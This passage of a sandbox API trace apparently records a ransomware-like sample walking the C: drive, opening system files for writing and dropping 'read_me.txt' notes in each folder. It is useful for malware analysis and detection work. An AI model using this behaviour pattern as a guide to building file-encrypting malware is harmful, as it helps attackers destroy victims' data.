ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0076.522] lstrcpyW (in: lpString1=0x8f231f8, lpString2="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media" [0076.522] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 134 [0076.522] QueueUserWorkItem (Function=0x40a710, Context=0x8f231f8, Flags=0x0) returned 1 [0076.522] GetProcessHeap () returned 0x280000 [0076.522] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8f33200 [0076.523] wnsprintfW (in: pszDest=0x8f33200, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\*") returned 46 [0076.523] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\*", lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0076.652] lstrcpyW (in: lpString1=0x8f131f0, lpString2="\\\\?\\C:\\Users\\Public\\Videos" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos") returned="\\\\?\\C:\\Users\\Public\\Videos" [0076.653] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 135 [0076.653] QueueUserWorkItem (Function=0x40a710, Context=0x8f131f0, Flags=0x0) returned 1 [0076.653] GetProcessHeap () returned 0x280000 [0076.653] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8f33200 [0076.653] wnsprintfW (in: pszDest=0x8f33200, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\*") returned 28 [0076.653] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x17f94f70, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x17f94f70, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0076.654] lstrcpyW (in: lpString1=0x8f44210, lpString2="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos") returned="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos" [0076.654] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 136 [0076.654] QueueUserWorkItem (Function=0x40a710, Context=0x8f44210, Flags=0x0) returned 1 [0076.654] GetProcessHeap () returned 0x280000 [0076.654] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8f54218 [0076.655] wnsprintfW (in: pszDest=0x8f54218, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\*") returned 42 [0076.655] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\*", lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 Thread: id = 2 os_tid = 0x940 Thread: id = 3 os_tid = 0x94c [0073.595] GetProcessHeap () returned 0x280000 [0073.595] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a60090 [0073.596] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\*") returned 8 [0073.596] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6010007, dwReserved1=0x78e0000, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x2b2638 [0073.596] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$Recycle.Bin") returned 19 [0073.596] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6010007, dwReserved1=0x78e0000, cFileName="Boot", cAlternateFileName="")) returned 1 [0073.596] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot") returned 11 [0073.596] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x6010007, dwReserved1=0x78e0000, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0073.596] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\bootmgr") returned 14 [0073.596] CreateFileW (lpFileName="\\\\?\\C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.605] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x6010007, dwReserved1=0x78e0000, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0073.605] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\BOOTSECT.BAK") returned 19 [0073.605] CreateFileW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.612] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6010007, dwReserved1=0x78e0000, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0073.612] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi") returned 17 [0073.616] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x78e0000, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0073.625] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Documents and Settings") returned 29 [0073.625] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x813b7be0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x78e0000, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0073.629] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\hiberfil.sys") returned 19 [0073.629] CreateFileW (lpFileName="\\\\?\\C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.680] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x78e0000, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0073.680] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache") returned 15 [0073.680] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x814762c0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x78e0000, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0073.680] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\pagefile.sys") returned 19 [0073.680] CreateFileW (lpFileName="\\\\?\\C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.680] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x78e0000, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0073.680] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs") returned 15 [0073.680] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf8fd7c90, ftLastAccessTime.dwHighDateTime=0x1d59ffd, ftLastWriteTime.dwLowDateTime=0xf8fd7c90, ftLastWriteTime.dwHighDateTime=0x1d59ffd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x78e0000, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0073.680] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files") returned 20 [0073.680] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x78e0000, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0073.681] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)") returned 26 [0073.681] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x78e0000, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0073.681] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData") returned 18 [0073.681] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x78e0000, cFileName="Recovery", cAlternateFileName="")) returned 1 [0073.681] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery") returned 15 [0073.681] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x78e0000, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0073.681] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\System Volume Information") returned 32 [0073.681] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x78e0000, cFileName="Users", cAlternateFileName="")) returned 1 [0073.681] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users") returned 12 [0073.681] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x78e0000, cFileName="Windows", cAlternateFileName="")) returned 1 [0073.681] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Windows") returned 14 [0073.681] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x78e0000, cFileName="Windows", cAlternateFileName="")) returned 0 [0073.681] FindClose (in: hFindFile=0x2b2638 | out: hFindFile=0x2b2638) returned 1 [0073.681] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\read_me.txt") returned 18 [0073.681] GetProcessHeap () returned 0x280000 [0073.681] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a60090 | out: hHeap=0x280000) returned 1 [0073.681] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 2 [0073.681] GetProcessHeap () returned 0x280000 [0073.681] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x89e0050 | out: hHeap=0x280000) returned 1 [0073.681] GetProcessHeap () returned 0x280000 [0073.681] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x89e0050 [0073.681] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\*") returned 19 [0073.681] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\da-DK\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x16754f50, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16754f50, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x78e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2638 [0073.681] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\.") returned 19 [0073.681] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x16754f50, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16754f50, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x78e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.681] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\..") returned 20 [0073.681] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x78e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.682] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 33 [0073.682] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.682] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16754f50, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16754f50, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16754f50, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x78e0000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0073.682] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\read_me.txt") returned 29 [0073.682] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\read_me.txt" (normalized: "c:\\boot\\da-dk\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0073.682] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0073.682] CloseHandle (hObject=0x7a8) returned 1 [0073.682] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16754f50, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16754f50, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16754f50, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x78e0000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0073.682] FindClose (in: hFindFile=0x2b2638 | out: hFindFile=0x2b2638) returned 1 [0073.682] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\read_me.txt") returned 29 [0073.682] GetProcessHeap () returned 0x280000 [0073.682] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x89e0050 | out: hHeap=0x280000) returned 1 [0073.682] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 3 [0073.682] GetProcessHeap () returned 0x280000 [0073.682] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a30078 | out: hHeap=0x280000) returned 1 [0073.682] GetProcessHeap () returned 0x280000 [0073.682] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a30078 [0073.682] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\*") returned 19 [0073.682] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\de-DE\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1677b0b0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x1677b0b0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x78e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2638 [0073.682] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\.") returned 19 [0073.682] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1677b0b0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x1677b0b0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x78e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.683] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\..") returned 20 [0073.683] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, 